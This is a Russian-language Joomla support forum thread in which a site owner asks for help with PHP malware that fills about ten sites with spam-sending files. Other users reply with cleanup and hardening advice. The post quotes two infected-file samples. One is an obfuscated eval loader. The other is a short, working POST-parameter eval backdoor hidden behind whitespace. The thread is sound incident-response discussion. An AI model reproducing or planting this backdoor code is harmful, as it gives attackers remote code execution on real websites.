Форум русской поддержки Joomla!® CMS
11.12.2016, 12:00:24 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Взломали сеть сайтов на Joomla

 (Прочитано 494 раз)
0 Пользователей и 1 Гость смотрят эту тему.
kanbodows
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 2


« : 17.09.2015, 10:40:01 »

Всем привет!

Имеется около 10ти сайтов на Joomla распложенных на одном сервере
Каждый из них за день забивается php файлами с вирусом PCT4BA6ODSE, который рассылает спам от нашего сервера и периодически захламляет сайт тучами ненужных файлов
В интернете кроме как предложения сделать readonly и сменить пароли ничего стоящего не предлагают
Чистка зараженных файлов и удаление новых созданных уже мягко говоря задолбала

Примеры создающихся файлов, которые появляются спонтанно, названия у них в основном в виде define.php или define + и двузначное число + .php, или include.php, help.php, cache.php и т.д.
Содержание в основном такого рода:

Код
<?php
function qoehwzxnn($rwks, $pbycg){$psnp = ''; for($i=0; $i < strlen($rwks); $i++){$psnp .= isset($pbycg[$rwks[$i]])? $pbycg[$rwks[$i]] : $rwks[$i];}
$ks="base64_decode";return $ks($psnp);}
$tdxprwhb = 'GrsKnj2Z04GHJEwFh6Azv4sB04JkQ6JZJkUUPWzPGrsKnj2Z04GHJEDR0c2sh9JRh9x97meFgUFe04JkQ6JBhojU'.
'Q6JtnC39PmeFgUFehEjt46wFQCjBQrsVn4GHxfqyfqAF0E3RhojBb4lshs2Tvo2kbf1DPWzPGrsKnj2Z04GHJEcTNu2sNrj'.
'Ob4wFQE3BbrsV0Ihzxfqyf1FF05eHbojkhEsRQs2OQEcUv4JsPuAdYu2CwjJWIY2g7fe9lIMU7Oe97fe9LfhFdfq1N'.
'UH1dfwk04x1LIAAh9JTNI1FgUH1dfwk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xmzPdfAsvETRdrJThEYElu2sQolR'.
'0rYHhEjknCuzn4FsPfwk04xFPWzPBGHP09jKv6wFQEM1v6jZbr2V46lthosU46wT06xHJXwsN'.
+еще тучу строк+
yf5wk04lQd9Jsh6jzbfJbCkJOnrjOnkJbdmt1xWzPfojOnra1vouZ0Wvt4Ej'.
'
KvE2q0ITZ04JFvCDFNoYHJXJshkqFgUHP04TFbf1FgU==';
$wtzvo = Array('
1'=>'g', '0'=>'Z', '3'=>'5', '2'=>'9', '5'=>'i', '4'=>'X', '7'=>'L', '6'=>'3', '9'=>'n', '8'=>'r', 'A'=>'B', 'C'=>'W', 'B'=>'f', 'E'=>'2', 'D'=>'x', 'G'=>'Q', 'F'=>'p', 'I'=>'S', 'H'=>'o', 'K'=>'u', 'J'=>'J', 'M'=>'4', 'L'=>'P', 'O'=>'j', 'N'=>'e', 'Q'=>'b', 'P'=>'K', 'S'=>'6', 'R'=>'v', 'U'=>'w', 'T'=>'h', 'W'=>'T', 'V'=>'t', 'Y'=>'U', 'X'=>'H', 'Z'=>'z', 'a'=>'8', 'c'=>'1', 'b'=>'d', 'e'=>'A', 'd'=>'I', 'g'=>'O', 'f'=>'C', 'i'=>'q', 'h'=>'c', 'k'=>'y', 'j'=>'V', 'm'=>'D', 'l'=>'N', 'o'=>'m', 'n'=>'a', 'q'=>'k', 'p'=>'E', 's'=>'l', 'r'=>'G', 'u'=>'F', 't'=>'0', 'w'=>'R', 'v'=>'Y', 'y'=>'7', 'x'=>'M', 'z'=>'s');
eval(qoehwzxnn($tdxprwhb, $wtzvo));?>

или

Код
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf03c87'])) {eval($s21(${$s20}['nf03c87']));}?>

или такой же код только уже в существующих файлах в самом начале.

Англоязычные форумы говорят что это уязвимость каких то бесплатных плагинов или плагины со сладейром

Помогите пожалуйста кто чем может!!  ! ! !
Выложу всю необходимую инфу  Cry Cry Cry
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #1 : 17.09.2015, 10:54:47 »

Ищите бэкдор - скорее всего, он там есть. Прогоните сайт манулом или айболитом и ищите.
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #2 : 17.09.2015, 11:26:50 »

На сервере под одним пользователем? Или под разными?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #3 : 17.09.2015, 12:24:14 »

А Версия Joomla ? проверить инфо о безопасности установленных сторонних расширений. А лучше  и проще для новичка- установить чистую Joomla + расширения и подключить старую базу данных
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #4 : 19.09.2015, 13:23:19 »

Нужно начинать профилактические меры с самого сервака, настройки файла php.ini, опен базе дир все под каждый сайт, каждый сайт разбить на отдельные учетные запеси, затем приступать к личению и профилактических мер самих сайтов!
Записан
resident82
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 24


« Ответ #5 : 22.09.2015, 12:48:51 »

похожая проблема, десяток сайтов на разных версиях Joomla, все под одной учеткой по условиям хостинга. пока блочу все подозрительные айпишники и вручную периодически чищу.. думаю может создать еще одну учетку и туда их по одному перекидывать постепенно.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #6 : 22.09.2015, 13:43:29 »

похожая проблема, десяток сайтов на разных версиях Joomla, все под одной учеткой по условиям хостинга. пока блочу все подозрительные айпишники и вручную периодически чищу.. думаю может создать еще одну учетку и туда их по одному перекидывать постепенно.
На крайняк можно сделать и под одной учеткой, но риск из-за одного касяченного не грамотного сайта, пострадают все, можно конечно снизить риски за счет грамотно настроенных прав и профилактических мер, но тут 100% нужна правка php.ini, за тем не помешало бы снифер повесить на все сайты, тоже можно с помощью php.ini, взломщик будет пытаться востановить доступ через багу, там то и встанет все на свои места и соответствующий патч, минус решения задачи через снифер, то что громоздкие логи будут, когда много сайтов, вообщем решение есть всегда! Было бы время и желание...
Записан
resident82
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 24


« Ответ #7 : 22.09.2015, 16:04:27 »

за тем не помешало бы снифер повесить на все сайты, тоже можно с помощью php.ini, взломщик будет пытаться востановить доступ через багу, там то и встанет все на свои места и соответствующий патч, минус решения задачи через снифер, то что громоздкие логи будут, когда много сайтов, вообщем решение есть всегда! Было бы время и желание...
снифер больше покажет чем логи хостинга?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #8 : 22.09.2015, 16:21:48 »

снифер больше покажет чем логи хостинга?
А это уже как вы захотите сделать, я какраз хотел подготовить статью для forum.antichat.ru, о том как реализовать подобный момент, там начиная от снифа header заголовков и зканчивая всем остольным, т.е один запрос может быть в полне весомым, в вашем случае достаточно будет POST,COOKIE, HEADER, Хостинг отслеживает только GET и REFERER ну и IP логично
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #9 : 23.09.2015, 01:25:36 »

снифер больше покажет чем логи хостинга?
Правильно написанный/настроенный покажет именно на проблему и в нем не будет лишнего, можно резать одинаковые строки для уменьшения объема и т.д.. Логи покажут, но в них меньше информации и они ведутся в обобщенно.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet